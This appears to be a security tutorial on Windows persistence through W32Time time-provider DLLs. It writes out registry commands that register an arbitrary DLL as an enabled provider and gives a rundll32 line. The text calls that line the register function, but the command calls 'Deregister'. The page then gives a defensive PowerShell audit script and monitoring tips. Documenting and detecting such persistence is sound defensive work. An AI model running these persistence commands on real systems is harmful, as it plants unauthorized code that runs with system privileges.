Time Provider
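Windows uses time providers to synchronize its clock with other machines on the network, so that it has accurate time information from other network devices. Time providers are DLLs registered under the Windows Time service (W32Time), which is what makes them usable for persistence. Time synchronization is very important because many protocols in AD require it.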
Note that your DLL needs to be coded in a special way; a template for this is available from Scott Lundgren of Carbon Black:
To use this for persistence, we can add these registry keys:
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_EXPAND_SZ /v "DllName" /d "%systemroot%\system32\exec.dll" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "InputProvider" /d "1" /f
Or use the gametime DLL and run the register function from it:
rundll32.exe gametime.dll,Deregister
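To check a host for this technique, the following audit script enumerates every provider registered under the TimeProviders key and flags entries that fall outside a baseline. It is an added example, not part of the original page; the baseline of stock providers and their DLLs (NtpClient, NtpServer, VMICTimeProvider) is an assumption to adjust for your environment.

```powershell
# Audit W32Time time providers and flag anything outside the expected baseline.
# Assumption: stock providers and their DLLs in System32; extend for your fleet.
$root     = 'HKLM:\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders'
$system32 = Join-Path $env:SystemRoot 'System32'
$baseline = @{
    'NtpClient'        = 'w32time.dll'
    'NtpServer'        = 'w32time.dll'
    'VMICTimeProvider' = 'vmictimeprovider.dll'
}

$findings = foreach ($key in Get-ChildItem -Path $root -ErrorAction Stop) {
    $name = $key.PSChildName
    # GetValue expands REG_EXPAND_SZ data such as %systemroot% by default
    $dll  = [string]$key.GetValue('DllName')
    $reasons = @()

    if (-not $baseline.ContainsKey($name)) {
        $reasons += 'provider name not in baseline'
    } elseif ($dll -ne (Join-Path $system32 $baseline[$name])) {
        $reasons += 'DllName differs from baseline path'
    }

    $sig = $null
    if ($dll -and (Test-Path -LiteralPath $dll -PathType Leaf)) {
        $sig = Get-AuthenticodeSignature -LiteralPath $dll
        if ($sig.Status -ne 'Valid') {
            $reasons += "signature status: $($sig.Status)"
        }
    } else {
        $reasons += 'DllName empty or file not found'
    }

    [pscustomobject]@{
        Provider      = $name
        Enabled       = $key.GetValue('Enabled')
        InputProvider = $key.GetValue('InputProvider')
        DllName       = $dll
        Signer        = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        Suspicious    = [bool]$reasons.Count
        Reasons       = $reasons -join '; '
    }
}

$findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

For ongoing detection, the same key can be monitored for new subkeys and DllName changes, for example with a registry auditing SACL or Sysmon registry events.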